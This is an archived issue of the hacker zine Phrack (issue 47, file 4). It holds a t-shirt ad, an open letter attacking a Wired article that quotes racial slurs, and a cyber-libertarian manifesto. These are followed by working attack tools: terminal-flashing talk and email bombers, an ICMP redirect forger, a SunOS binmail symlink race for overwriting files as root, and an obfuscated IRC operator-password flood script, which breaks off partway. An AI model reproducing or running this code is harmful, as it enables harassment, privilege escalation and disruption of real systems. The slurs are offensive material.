The Hacker's Encyclopedia 1998

home *** CD-ROM | disk | FTP | other *** search

/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / zines / phrack2 / phrack47.tx4 < prev next >

Wrap

Text File | 2003-06-11 | 63.7 KB | 2,039 lines

==Phrack Magazine== Volume Six, Issue Forty-Seven, File 4 of 22 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== PART II ------------------------------------------------------------------------------ The official Legion of Doom t-shirts are stll available!!! Join the net luminaries world-wide in owning one of these amazing shirts. Impress members of the opposite sex, increase your IQ, annoy system administrators, get raided by the government and lose your wardrobe! Can a t-shirt really do all this? Of course it can! -------------------------------------------------------------------------- "THE HACKER WAR -- LOD vs MOD" This t-shirt chronicles the infamous "Hacker War" between rival groups The Legion of Doom and The Masters of Destruction. The front of the shirt displays a flight map of the various battle-sites hit by MOD and tracked by LOD. The back of the shirt has a detailed timeline of the key dates in the conflict, and a rather ironic quote from an MOD member. (For a limited time, the original is back!) "LEGION OF DOOM -- INTERNET WORLD TOUR" The front of this classic shirt displays "Legion of Doom Internet World Tour" as well as a sword and telephone intersecting the planet earth, skull-and-crossbones style. The back displays the words "Hacking for Jesus" as well as a substantial list of "tour-stops" (internet sites) and a quote from Aleister Crowley. -------------------------------------------------------------------------- All t-shirts are sized XL, and are 100% cotton. Cost is $15.00 (US) per shirt. International orders add $5.00 per shirt for postage. Send checks or money orders. Please, no credit cards, even if it's really your card. Name: __________________________________________________ Address: __________________________________________________ City, State, Zip: __________________________________________ I want ____ "Hacker War" shirt(s) I want ____ "Internet World Tour" shirt(s) Enclosed is $______ for the total cost. Mail to: Chris Goggans 603 W. 13th #1A-278 Austin, TX 78701 These T-shirts are sold only as a novelty items, and are in no way attempting to glorify computer crime. ------------------------------------------------------------------------------ [The editor's Open Letter to Wired Magazine...they actually had the nerve to print it in their May issue. Amazing...or was it? The letter was posted to 10 USENET newsgroups, put on the Wired forums on AOL, Mindvox and the Well, sent in email to every user of wired.com, faxed to all 7 fax machines at Wired and sent to them registered mail. Probably more than 5 times Wired's paid circulation saw it, so they HAD to print it or look foolish. At least, that's my take on it. Just for overkill, here it is again.] To Whom It May Concern: I am writing this under the assumption that the editorial staff at Wired will "forget" to print it in the upcoming issue, so I am also posting it on every relevant newsgroup and online discussion forum that I can think of. When I first read your piece "Gang War In Cyberspace" I nearly choked on my own stomach bile. The whole tone of this piece was so far removed from reality that I found myself questioning what color the sky must be in Wired's universe. Not that I've come to expect any better from Wired. Your magazine, which could have had the potential to actually do something, has become a parody...a politically correct art-school project that consistently falls short of telling the whole story or making a solid point. (Just another example of Kapor-Kash that ends up letting everyone down.) I did however expect more from Josh Quittner. I find it interesting that so much emphasis can be placed on an issue of supposed racial slurs as the focus of an imaginary "gang war," especially so many years after the fact. It's also interesting to me that people keep overlooking the fact that one of the first few members of our own little Legion of Doom was black (Paul Muad'dib.) Maybe if he had not died a few years back that wouldn't be so quickly forgotten. (Not that it makes a BIT of difference what color a hacker is as long as he or she has a brain and a modem, or these days at least a modem.) I also find it interesting that a magazine can so easily implicate someone as the originator of the so-called "fighting words" that allegedly sparked this online-battle, without even giving a second thought as to the damage that this may do to the person so named. One would think that a magazine would have more journalistic integrity than that (but then again, this IS Wired, and political correctness sells magazines and satisfies advertisers.) Thankfully, I'll only have to endure one month of the "Gee Chris, did you know you were a racist redneck?" phone calls. It's further odd that someone characterized as so sensitive to insults allegedly uttered on a party-line could have kept the company he did. Strangely enough, Quittner left out all mention of the MOD member who called himself "SuperNigger." Surely, John Lee must have taken umbrage to an upper-middle class man of Hebrew descent so shamefully mocking him and his entire race, wouldn't he? Certainly he wouldn't associate in any way with someone like that...especially be in the same group with, hang out with, and work on hacking projects with, would he? Please, of course he would, and he did. (And perhaps he still does...) The whole "racial issue" was a NON-ISSUE. However, such things make exciting copy and garner many column inches so keep being rehashed. In fact, several years back when the issue first came up, the statement was cited as being either "Hang up, you nigger," or "Hey, SuperNigger," but no one was sure which was actually said. Funny how the wording changes to fit the slant of the "journalist" over time, isn't it? I wish I could say for certain which was actually spoken, but alas, I was not privy to such things. Despite the hobby I supposedly so enjoyed according to Quittner, "doing conference bridges," I abhorred the things. We used to refer to them as "Multi-Loser Youps" (multi-user loops) and called their denizens "Bridge Bunnies." The bridge referred to in the story was popularized by the callers of the 5A BBS in Houston, Texas. (A bulletin board, that I never even got the chance to call, as I had recently been raided by the Secret Service and had no computer.) Many people from Texas did call the BBS, however, and subsequently used the bridge, but so did people from Florida, Arizona, Michigan, New York and Louisiana. And as numbers do in the underground, word of a new place to hang out caused it to propagate rapidly. To make any implications that such things were strictly a New York versus Texas issue is ludicrous, and again simply goes to show that a "journalist" was looking for more points to add to his (or her) particular angle. This is not to say that I did not have problems with any of the people who were in MOD. At the time I still harbored strong feelings towards Phiber Optik for the NYNEX-Infopath swindle, but that was about it. And that was YEARS ago. (Even I don't harbor a grudge that long.) Even the dozen or so annoying phone calls I received in late 1990 and early 1991 did little to evoke "a declaration of war." Like many people, I know how to forward my calls, or unplug the phone. Amazing how technology works, isn't it? Those prank calls also had about as much to do with the formation of Comsec as bubble-gum had to do with the discovery of nuclear fission. (I'm sure if you really put some brain power to it, and consulted Robert Anton Wilson, you could find some relationships.) At the risk of sounding glib, we could have cared less about hackers at Comsec. If there were no hackers, or computer criminals, there would be no need for computer security consultants. Besides, hackers account for so little in the real picture of computer crime, that their existence is more annoyance than something to actually fear. However, when those same hackers crossed the line and began tapping our phone lines, we were more than glad to go after them. This is one of my only rules of action: do whatever you want to anyone else, but mess with me and my livelihood and I will devote every ounce of my being to paying you back. That is exactly what we did. This is not to say that we were the only people from the computer underground who went to various law enforcement agencies with information about MOD and their antics. In fact, the number of hackers who did was staggering, especially when you consider the usual anarchy of the underground. None of these other people ever get mentioned and those of us at Comsec always take the lead role as the "narks," but we were far from alone. MOD managed to alienate the vast majority of the computer underground, and people reacted. All in all, both in this piece, and in the book itself, "MOD, The Gang That Ruled Cyberspace," Quittner has managed to paint a far too apologetic piece about a group of people who cared so very little about the networks they played in and the people who live there. In the last 15 years that I've been skulking around online, people in the community have always tended to treat each other and the computers systems they voyeured with a great deal of care and respect. MOD was one of the first true examples of a groupthink exercise in hacker sociopathy. Selling long distance codes, selling credit card numbers, destroying systems and harassing innocent people is not acceptable behavior among ANY group, even the computer underground. There have always been ego flares and group rivalries in the underground, and there always will be. The Legion of Doom itself was FOUNDED because of a spat between its founder (Lex Luthor) and members of a group called The Knights of Shadow. These rivalries keep things interesting, and keep the community moving forward, always seeking the newest bit of information in a series of healthy one-upsmanship. MOD was different. They took things too far against everyone, not just against two people in Texas. I certainly don't condemn everyone in the group. I don't even know a number of them (electronically or otherwise.) I honestly believe that Mark Abene (Phiber) and Paul Stira (Scorpion) got royally screwed while the group's two biggest criminals, Julio Fernandez (Outlaw) and Allen Wilson (Wing), rolled over on everyone else and walked away free and clear. This is repulsive when you find out that Wing in particular has gone on to be implicated in more damage to the Internet (as Posse and ILF) than anyone in the history of the computing. This I find truly disgusting, and hope that the Secret Service are proud of themselves. Imagine if I wrote a piece about the terrible treatment of a poor prisoner in Wisconsin who was bludgeoned to death by other inmates while guards looked away. Imagine if I tried to explain the fact that poor Jeff Dahmer was provoked to murder and cannibalism by the mocking of adolescent boys who teased and called him a faggot. How would you feel if I tried to convince you that we should look upon him with pity and think of him as a misunderstood political prisoner? You would probably feel about how I do about Quittner's story. 'Hacker' can just as easily be applied to "journalists" too, and with this piece Quittner has joined the Hack Journalist Hall of Fame, taking his place right next to Richard Sandza. Quittner did get a few things right. I do have a big cat named Spud, I do work at a computer company and I do sell fantastic t-shirts. Buy some. With Love, Chris Goggans aka Erik Bloodaxe phrack@well.com ------------------------------------------------------------------------------ From: DigitaLiberty@phantom.com Subject: Announcing - The DigitaLiberty Forum PLEASE RE-DISTRIBUTE THIS AS YOU SEE FIT Friends of Liberty, It is becoming increasingly apparent that the arrival of cyberspace is destined to engender a fundamental discontinuity in the course of human relations. This is a source of great optimism and opportunity for those of us who believe in freedom. Many of you who participate in the lively debates that take place in these forums have seen a number of activist organizations spring up claiming to represent the cause of freedom. And if you are like me you have cheered these groups on only to watch them get bogged down in a quagmire of realpolitics. It is a sad fact that the beast in Washington has evolved into a self-perpetuating engine expert at co-opting the principles of even the most ardent reformers. Slowly but surely all those who engage the system are ultimately absorbed into the mainstream miasma of majoritarianism. For example, what can be more discouraging than watching an organization that started out as a civil liberties group shift its focus to creating new forms of government entitlements while endorsing intrusive wiretap legislation because they didn't want to jeopardize their influence and prestige amongst the Washington power elite? Some of us believe we can seek ultimate redress at the polls. Many pundits have declared our recent national elections a watershed in politics, a turning point that represents the high water mark of big government. Nonsense. The names have changed, the chairs have been rearranged, but the game remains the same. The so-called "choices" we are presented with are false, hardly better than the mock one-party elections held by failed totalitarian regimes. There must be a better way. I would like to announce the formation of a new group - DigitaLiberty - that has chosen a different path. We intend to bypass the existing political process. We reject consensus building based on the calculus of compromise. Instead we plan to leave the past behind, much as our pioneering forefathers did when they set out to settle new lands. It is our mission to create the basis for a different kind of society. If you would like to join us I invite you to read the information below. Yours in freedom, Bill Frezza Co-founder, DigitaLiberty December 1994 *** What is DigitaLiberty? DigitaLiberty is an advocacy group dedicated to the principled defense of freedom in cyberspace. We intend to conduct this defense not by engaging in traditional power politics but by setting an active, persuasive example - creating tangible opportunities for others to join us as we construct new global communities. We believe deeply in free markets and free minds and are convinced that we can construct a domain in which the uncoerced choices of individuals supplant the social compact politics of the tyranny of the majority. *** Is DigitaLiberty a political party or a lobbying group? Neither. DigitaLiberty does not seek to educate or influence politicians in the hope of obtaining legislation favorable to our constituents. We plan to make politicians and legislators irrelevant to the future of network based commerce, education, leisure, and social intercourse. DigitaLiberty does not seek to persuade a majority of the electorate to adopt views which can then be forced upon the minority. We hope to make majoritarianism irrelevant. We invite only like minded individuals to help us build the future according to our uncompromised shared values. *** What do you hope to accomplish? DigitaLiberty is not hopeful that widespread freedom will come to the physical world, at least not in our lifetime. Too many constituencies depend upon the largess and redistributive power of national governments and therefore oppose freedom and the individual responsibility it entails. But we do believe that liberty can and will prevail in the virtual domains we are building on the net and that national governments will be powerless to stop us. We believe that cyberspace will transcend national borders, national cultures, and national economies. We believe that no one will hold sovereignty over this new realm because coercive force is impotent in cyberspace. In keeping with the self-organizing nature of on-line societies we believe we will chose to invent new institutions to serve our varied economic and social purposes. DigitaLiberty intends to be in the forefront of the discovery and construction of these institutions. *** But what about the construction of the "Information Superhighway"? The fabric of cyberspace is rapidly being built by all manner of entities espousing the full range of political and economic philosophies. While political activity can certainly accelerate or retard the growth of the net in various places and times it cannot stop it nor can it effectively control how the net will be used. Our focus is not on the institutions that can and will impact the building of the physical "information highway" but on those that will shape life on the net as an ever increasing portion of our productive activities move there. *** What makes you think cyberspace will be so different? The United States of America was the only country in history ever to be built upon an idea. Unfortunately, this idea was lost as we slowly traded away our liberties in exchange for the false promise of security. DigitaLiberty believes that technology can set us free. The economies of the developed world are now making a major transition from an industrial base to an information base. As they do, the science of cryptology will finally and forever guarantee the unbreachable right of privacy, protecting individuals, groups, and corporations from the prying eyes and grasping hands of sovereigns. We will all be free to conduct our lives, and most importantly our economic relations, as we each see fit. Cyberspace is also infinitely extensible. There will be no brutal competition for lebensraum. Multiple virtual communities can exist side by side and without destructive conflict, each organized according to the principles of their members. We seek only to build one such community, a community based on individual liberty. Others are free to build communities based on other principles, even diametrically opposed principles. But they must do so without our coerced assistance. Effective communities will thrive and grow. Dysfunctional communities will wither and die. And for the first time in human history, rapacious societies will no longer have the power to make war on their neighbors nor can bankrupt communities take their neighbors down with them. *** What does this have to do with my real life? I can't eat data. I don't live in a computer. Yes, but imagine the ultimate impact of mankind's transition from an agrarian economy to an industrial economy to an information economy. Our founding fathers would have consider anyone insane who predicted that a nation of 250 million could feed itself with fewer than 3% of its citizens involved in agriculture. Similarly, economists and politicians trapped in the policies of the past lament our move from a manufacturing economy to a knowledge worker and service based economy. We see this as a cause to rejoice. The day will come when fewer than 5% of the citizens of a nation of 1 billion will be involved in manufacturing - if we still bother calling geographically defined entities "nations". What will the rest of us be doing? We will be providing each other with an exploding array of services and we will be creating, consuming, and exchanging information. Most of this will occur entirely within or be mediated at least in part by our activities in cyberspace. Many of us will earn a very good living on the net. Our race, our religion, our gender, our age, our physical appearance and limitations will all be irrelevant and undetectable. Hard working individuals from underdeveloped nations who in the past might have been forced to emigrate in search of economic freedom and opportunity can now build productive lives in cyberspace. And much if not all of the wealth we create that we do not transform into visible physical assets will be ours to keep and use, beyond the grasp of sovereigns. *** What is the purpose of this forum? The DigitaLiberty Forum is a place where like minded individuals can share their views, observations, and strategies related to the development of virtual communities based on freedom. It is a place where people can exchange information and advice about how they have developed extra-territorial business and social relationships - away from the influence and outside the jurisdiction of governments. It is a forum for the posting of essays, questions, and ideas on the topic of liberty. It is a place where we can meet and debate the forms that our new institutions might take and discuss the practical problems and responsibilities that freedom entail. In time as our technology matures some of us will move on to more ambitious projects, launch other programs, and begin our virtual migration from the swamp of coerced collectivism. Best of all, there will be no need to physically move to 'Galt's Gulch' or escape to a floating 'Freedonia'. We can all participate in this exodus without hastily quitting our jobs or disrupting our lives. And as a larger and larger portion of our economic and social activities move onto the net we will create a new society, open to all with the will to enter. This new world will be interleaved with the physical world in which we now live and yet will be separate. And free. Join us as we begin the journey. *** Who can join DigitaLiberty? The DigitaLiberty Forum is open to anyone that can honestly answer yes to the following two questions: 1) I renounce the use of coercive force as a tool of social or economic policy. 2) I do not derive the majority of my income from funds taken from taxpayers. *** How do I join DigitaLiberty? If you qualify, send a message to DigitaLiberty-request@phantom.com with the words "SUBSCRIBE" in the subject line and the message body as follows SUBSCRIBE DigitaLiberty <your name> And welcome to the future. ### ------------------------------------------------------------------------------ /* flash3.c */ /* Modified from the original by Vassago. Superflash mods unknown. Try the PhoEniX FTP Site: wentz21.reslife.okstate.edu in /pub. */ /* This little program is intended to quickly mess up a user's terminal by issuing a talk request to that person and sending vt100 escape characters that force the user to logout or kill his/her xterm in order to regain a sane view of the text. It the user's message mode is set to off (mesg n) he/she will be unharmed. Try compiling with: gcc -o flash flash3.c Usage: flash user@host [<level>] Level is either the number or the word for these: 1) BASIC - Old flash, no zmodem. 2) ZMODEM - Old with ZModem. 3) KILLER - 99 ZModem flashes. */ #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <stdio.h> #include <strings.h> #include <string.h> #include <ctype.h> #define BASIC 1 #define ZMODEM 2 #define KILLER 3 #define FIRST "\033(0\033#8" #define SECOND "\033[1;3r" #define THIRD "\033[1;5m\033(0" #define FOURTH "**\030B00" #define FIFTH "\033**EMSI_IRQ8E08" /* Comment this to remove the debugging message... */ #define INFOMESSAGE /* this should really be in an include file.. */ #define OLD_NAME_SIZE 9 #define NAME_SIZE 12 #define TTY_SIZE 16 typedef struct { char type; char l_name[OLD_NAME_SIZE]; char r_name[OLD_NAME_SIZE]; char filler; u_long id_num; u_long pid; char r_tty[TTY_SIZE]; struct sockaddr_in addr; struct sockaddr_in ctl_addr; } OLD_MSG; typedef struct { u_char vers; char type; u_short filler; u_long id_num; struct sockaddr_in addr; struct sockaddr_in ctl_addr; long pid; char l_name[NAME_SIZE]; char r_name[NAME_SIZE]; char r_tty[TTY_SIZE]; } CTL_MSG; int seed = 0x2837; #define TALK_VERSION 1 /* protocol version */ /* Types */ #define LEAVE_INVITE 0 #define LOOK_UP 1 #define DELETE 2 #define ANNOUNCE 3 int current = 1; /* current id.. this to avoid duplications */ struct sockaddr_in *getinaddr(char *hostname, u_short port) { static struct sockaddr addr; struct sockaddr_in *address; struct hostent *host; address = (struct sockaddr_in *)&addr; (void) bzero( (char *)address, sizeof(struct sockaddr_in) ); /* fill in the easy fields */ address->sin_family = AF_INET; address->sin_port = htons(port); /* first, check if the address is an ip address */ address->sin_addr.s_addr = inet_addr(hostname); if ( (int)address->sin_addr.s_addr == -1) { /* it wasn't.. so we try it as a long host name */ host = gethostbyname(hostname); if (host) { /* wow. It's a host name.. set the fields */ /* ?? address->sin_family = host->h_addrtype; */ bcopy( host->h_addr, (char *)&address->sin_addr, host->h_length); } else { /* oops.. can't find it.. */ puts("Flash aborted, could not find address."); exit(-1); return (struct sockaddr_in *)0; } } /* all done. */ return (struct sockaddr_in *)address; } SendTalkPacket(struct sockaddr_in *target, char *p, int psize) { int s; struct sockaddr sample; /* not used.. only to get the size */ s = socket(AF_INET, SOCK_DGRAM, 0); sendto( s, p, psize, 0,(struct sock_addr *)target, sizeof(sample) ); } new_ANNOUNCE(char *hostname, char *remote, char *local) { CTL_MSG packet; struct sockaddr_in *address; /* create a packet */ address = getinaddr(hostname, 666 ); address->sin_family = htons(AF_INET); bzero( (char *)&packet, sizeof(packet) ); packet.vers = TALK_VERSION; packet.type = ANNOUNCE; packet.pid = getpid(); packet.id_num = current; bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) ); bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr)); strncpy( packet.l_name, local, NAME_SIZE); strncpy( packet.r_name, remote, NAME_SIZE); strncpy( packet.r_tty, "", 1); SendTalkPacket( getinaddr(hostname, 518), (char *)&packet, sizeof(packet) ); } old_ANNOUNCE(char *hostname, char *remote, char *local) { OLD_MSG packet; struct sockaddr_in *address; /* create a packet */ address = getinaddr(hostname, 666 ); address->sin_family = htons(AF_INET); bzero( (char *)&packet, sizeof(packet) ); packet.type = ANNOUNCE; packet.pid = getpid(); packet.id_num = current; bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) ); bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr)); strncpy( packet.l_name, local, NAME_SIZE); strncpy( packet.r_name, remote, NAME_SIZE); strncpy( packet.r_tty, "", 1); SendTalkPacket( getinaddr(hostname, 517), (char *)&packet, sizeof(packet) ); } int rnd() { seed *=0x1243; seed = seed & 0xFFFF; seed +=1; while(seed>10000)seed-=10000; return(seed); } pop(char *hostname, char *username, char *flashstring) { char newflashstr[80]; int e = rnd(); sprintf(newflashstr,"%d%s",e,flashstring); new_ANNOUNCE(hostname, username, newflashstr); old_ANNOUNCE(hostname, username, newflashstr); } flash(int type, char *hostname, char *username) { char firestring[10]; int x,y; current=0; if (type == 3) y = 14; else y = 1; for(x=0;x<y;x++) { current++; pop(hostname, username, FIRST); current++; pop(hostname, username, SECOND); current++; pop(hostname, username, THIRD); if(type>1) { current++; pop(hostname, username, FOURTH); current++; pop(hostname, username, FIFTH); current++; pop(hostname, username, FOURTH); } current++; pop(hostname, username, FIRST); } return(current); } GetType(char *TypeStr) { if (strcmp(TypeStr,"basic")==0) return(1); else if (strcmp(TypeStr,"zmodem")==0) return(2); else if (strcmp(TypeStr,"killer")==0) return(3); else if (strcmp(TypeStr,"1")==0) return(1); else if (strcmp(TypeStr,"2")==0) return(2); else if (strcmp(TypeStr,"3")==0) return(3); } main(int argc, char *argv[]) { char *hostname, *username; int pid,type,name; if ( (pid = fork()) == -1) { perror("fork()"); exit(-1); } if ( !pid ) { exit(0); } if (argc < 2) { puts("USAGE: flash user@host [<flash type>]"); puts("Types are: 1) basic, 2) zmodem, 3) killer."); puts("Default flash type is zmodem."); exit(5); } if (argc >= 3) { type=GetType(argv[argc-1]); if(type<1||type>3)type=ZMODEM; } else type=ZMODEM; /* default */ for(name=1; name<argc-1; name++) { username = argv[name]; if ( (hostname = (char *)strchr(username, '@')) == NULL ) { puts("Aborted, invalid name. "); exit(-1); } *hostname = '\0'; hostname++; if (*username == '~') username++; #ifdef INFOMESSAGE printf("Sending a type #%d flash to %s@%s. (%d messages)\n", type,username,hostname, flash(type,hostname,username)); #else flash(type,hostname,username); #endif sleep(1); } } ------------------------------------------------------------------------------ /* Mail Flash - (C) 1994 CHA0S All Rights Reserved This is a simple program which demonstrates the problem with certain parts of VT100 emulation. Previously similar programs made use of talkd, but a user could stop attempts by simply entering "mesg n". This program sends the "flash" string which will really screw over a terminal in the SUBJECT header of e-mail. E-Mail readers such as pine show you this before you can decide to even delete the mail! Support has been added to choose your own SMTP server for neat-o hostname spoofing. (krad!) */ #include <stdio.h> #include <sys/param.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <stdarg.h> void smtp_connect(char *server); int thesock; /* the socket */ void smtp_connect(char *server) { struct sockaddr_in sin; struct hostent *hp; hp = gethostbyname(server); if (hp==NULL) { printf("Unknown host: %s\n",server); exit(0); } bzero((char*) &sin, sizeof(sin)); bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length); sin.sin_family = hp->h_addrtype; sin.sin_port = htons(25); thesock = socket(AF_INET, SOCK_STREAM, 0); connect(thesock,(struct sockaddr *) &sin, sizeof(sin)); } void main(int argc, char **argv) { char buf[1024]; if (argc != 4) { printf("usage: mflash smtp_server from to\n"); exit(0); } printf("Connecting to SMTP Server %s\n",argv[1]); smtp_connect(argv[1]); printf("Sending Mail Flash To %s\n",argv[3]); sprintf(buf, "helo a\nmail from: %s\nrcpt to: %s\ndata\nSUBJECT: \033c\033(0\033#8\033[1;3r\033[J\033[5m\033[?5h\n.\nquit\n",argv[2],argv[3]); send(thesock, buf, strlen(buf), 0); /* I am not sure how to check when this buffer is done being sent. If you are having any problems increase the sleep time below! */ printf("Sleeping To Make Sure Data Is Sent ...\n"); sleep(3); printf("Done!\n"); } ------------------------------------------------------------------------------ [Editor's Note: Does this work? I don't think so, but a clever hacker might use the code to do something "interesting." The concept is sound...the delivery needs a bit of tweaking.] #include <netdb.h> #include <sys/time.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> #include <netinet/tcp.h> #include <signal.h> #include <errno.h> #include <string.h> #include <stdlib.h> #include <stdio.h> int resolver(host,saddr) char *host; struct sockaddr_in *saddr; { struct hostent *h=gethostbyname(host); bzero(saddr,sizeof(struct sockaddr)); saddr->sin_family=AF_INET; if (h!=NULL) { saddr->sin_family=h->h_addrtype; bcopy(h->h_addr,(caddr_t)&saddr->sin_addr,h->h_length); return(0); } else { fprintf(stderr,"juju-router: unknown host ``%s''\n",host); return(-1); } return(0); } in_cksum(addr,len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* This function was taking from existing ICMP nuke code and was presumably originally stripped from a ``ping.c'' implementation. */ while( nleft > 1 ) { sum+=*w++; nleft-=2l; } if( nleft == 1 ) { *(u_char *)(&answer) = *(u_char *)w; sum+=answer; } sum=(sum>>16)+(sum& 0xffff); sum+=(sum>>16); answer=~sum; return(answer); } int icmp_reroute(host,uhost,port,code) char *host, *uhost; int code, port; { struct sockaddr_in name; struct sockaddr dest, uspoof; struct icmp *mp; struct tcphdr *tp; struct protoent *proto; int i, s, rc; char *buf=(char *) malloc(sizeof(struct icmp)+64); mp=(struct icmp *) buf; if (resolver(host,&dest)<0) return(-1); if (resolver(uhost,&uspoof)<0) return(-1); if ((proto=getprotobyname("icmp")==NULL)) { fprintf(stderr,"fatal; unable to determine protocol number of ``icmp''\n"); return(-1); } if ((s=socket(AF_INET,SOCK_RAW,proto->p_proto))<0) { perror("opening raw socket"); return(-1); } name.sin_family=AF_INET; name.sin_addr.s_addr=INADDR_ANY; name.sin_port=htons(port); if ((rc=bind(s,(struct sockaddr *) &name, sizeof(name)))==-1) { fprintf(stderr,"fatal; error binding sockets\n"); return(-1); } if ((proto=getprotobyname("tcp")==NULL)) { fprintf(stderr,"fatal; unable to determine protocol number of ``tcp''\n"); return(-1); } bzero(mp,sizeof(struct icmp)+64); mp->icmp_type = ICMP_REDIRECT; mp->icmp_code = code; mp->icmp_ip.ip_v = IPVERSION; mp->icmp_ip.ip_hl = 5; mp->icmp_ip.ip_len = htons(sizeof(struct ip)+64+20); mp->icmp_ip.ip_p = IPPROTO_TCP; mp->icmp_ip.ip_src = ((struct sockaddr_in *)&dest)->sin_addr; mp->icmp_ip.ip_dst = ((struct sockaddr_in *)&dest)->sin_addr; mp->icmp_gwaddr = ((struct sockaddr_in *)&uspoof)->sin_addr; mp->icmp_ip.ip_ttl = 150; mp->icmp_cksum = 0; tp=(struct tcphdr *)((char *)&mp->icmp_ip+sizeof(struct ip)); tp->th_sport = 23; tp->th_dport = htons(1499); tp->th_seq = htonl(0x275624F2); mp->icmp_cksum = htons(in_cksum(mp,sizeof(struct icmp)+64)); if ((i=sendto(s,buf,sizeof(struct icmp)+64,0,&dest,sizeof(dest)))<0) { fprintf(stderr,"fatal; error sending forged packet\n"); return(-1); } return(0); } void main(argc,argv) int argc; char **argv; { int i, code; if ((argc<4) || (argc>5)) { fprintf(stderr,"usage: juju-router target new-destination port code\n"); fprintf(stderr,"codes: 0 _REDIRECT_NET 1 _REDIRECT_HOST (default)\n"); fprintf(stderr," 2 _REDIRECT_TOSNET 2 _REDIRECT_TOSHOST\n"); exit(1); } printf("juju-router: rerouting dynamically...."); if (code!=0 && code!=1 && code!=2 && code!=3) code=0; if (icmp_reroute(argv[1],argv[2],argv[3],code)<0) { printf("failed.\n"); exit(1); } printf("succeeded.\n"); exit(0); } ------------------------------------------------------------------------------ #!/bin/sh # tmpmail: overwrite files using binmail # # Usage: tmpmail to-file # # (c) [8lgm] 1994, tested under SunOS 4.1.2. # # # Note: Script only works if mail is suid root. # Other vendors may use tmpnam("ma"). # # This vulnerability can be exploited for sgid # mail binmails, the only modification would # be to predict the pid of the mail process # created by sendmail. This would be 4 forward # of the current pid - assuming a 'quiet' system. # # Will create to-file, or truncate. PATH=/usr/ucb:/usr/bin:/bin export PATH IFS=" " export IFS PROG="`basename $0`" # Check args if [ $# -ne 1 ]; then echo "Syntax: $PROG to-file" exit 1 fi TO_FILE="$1" # Check we're on SunOS if [ "x`uname -s`" != "xSunOS" ]; then echo "Sorry, this only works on SunOS" exit 1 fi # Create our racing program! cat > mailrace.c << 'EOF' #include <stdio.h> #include <unistd.h> char path[] = "/tmp/maaXXXX"; main(argc,argv) int argc; char **argv; { int pid; char *trv; if (argc != 3) { fprintf(stderr, "Usage: %s pid tofile\n", argv[0]); exit(1); } pid = atoi(argv[1]); /* Stolen from mktemp.c */ for (trv = path; *trv; ++trv); /* extra X's get set to 0's */ while (*--trv == 'X') { *trv = (pid % 10) + '0'; pid /= 10; } symlink("/tmp/ShortSong", path); while(symlink(argv[2], path)); exit(0); } EOF cc -o mailrace mailrace.c # Check we now have mailrace if [ ! -x "mailrace" ]; then echo "$PROG: couldnt compile mailrace.c - check it out" exit 1 fi # create some input for binmail echo localhost $USER > /tmp/BlueRoom.$$ ./mailrace $$ $TO_FILE & exec /bin/mail -d $LOGNAME < /tmp/BlueRoom.$$ ------------------------------------------------------------------------------ ############################################################################### # # ## ### # # ## ### Attempts to hack IRC operator status by # # # # # # # # # # # flooding the server with bogus passwords #### #### # ## # # # # of various lengths. Works on all servers # # # # # # # # # ### I've tested so far.. # # # # ### # # ## # v1.3+path - Illegible 8 ############################################################################### set NOVICE off # # ### Bogus passwords.. don't change these. Other passwords don't work. (?) # # @ HackOP.A = [EACAGCGPGGGICADNCAFLGJGMGMGFGHGJGCGMDIFN] @ HackOP.B = [FOGPGOCAFOGNGPGEGFCACCCFCACFCACLHHHDCCCAGFGDGIGPCACKCKCKCAENGPGEGFCAGDGIGBGOGHGFCACCCLGPHDHHCCCAGGGPHCCAHFHDGFHCCACEEOCAGCHJCACEEODLHDGFHECAFDFEEBFEFFFDFPFFENEPEEEFCACACICLGPCFCDCJ] @ HackOP.C = [FOGPGOCACDCNHDGFGOGEFPGNHDGHCADBCACKCAHLCPCPFOGOGPHEGJGDGFCACEGCGPGGGICACEEOCACNDOCACKCEDACKCACEDBCNHN] @ HackOP.D = [GNGPGEGFCAEKHFGHGHGMGFHCCACLHDHH] @ HackOP.E = [GFGDGIGPCACKCKCKCAFJGPHFCAGBHCGFCAGOGPHHCAGBGOCAEJFCEDCAEPHAGFHCGBHEGPHC] @ HackOP.F = [FOGPGOCAGNGPGEGFCACNCCCFCACFCACLHHHDCC] @ HackOP.G = [FOGPGOCACDCNHCGBHHFPGJHCGDCADACACCCFCADDDBDCCACKCCCAHLGJGGCACIFLCEDDFNDNDNFLCEEOFNCJCAHLHEGJGNGFHCCADACAGFGDGIGPCACKCKCKCACEDDCAGJHDCAGBGOCAEJFCEDCAEPHAGFHCGBHEGPHCHNHN] @ HackOP.H = [EACAFDFEEBFEFFFDFPFFENEPEEEFCADNCAFLCAFMCICLGPCFCDFMCJFN] @ HackOP.I = [FOGPGOCAFOGDHEGDHACACCCFCACFCAEJFCEDEPFACACKCCCAHLEACAGCGPGGGICADNCAFLCEDAFNDLCPCPFOGOGPHEGJGDGFCACEGCGPGGGICAEIGPCAGIGPCAGIGPCBHN] @ HackOP.J = [FOGPGOCAFOGDHEGDHACACCCFCACFCAEJFCEDEPFHCACKCCCAHLGJGGCACIFLCEDAFNDNDNFLCEGCGPGGGIFNCJCAHLCEDDCNDLCPCPFOGOGPHEGJGDGFCACEDACAGEGPGJGOGHDKCACEDDCNHNHN] @ HackOP.K = [FOGBGMGJGBHDCAGLGJGMGMCAGJGGCACIFLCEDAFNCJCAHLCPCPFOHDGJGHGOGPGGGGCAELGJGMGMCAGGHCGPGNCACEEOCAFMCICEDACNFMCJHNHLCPCPELEJEMEMHN] @ HackOP.L = 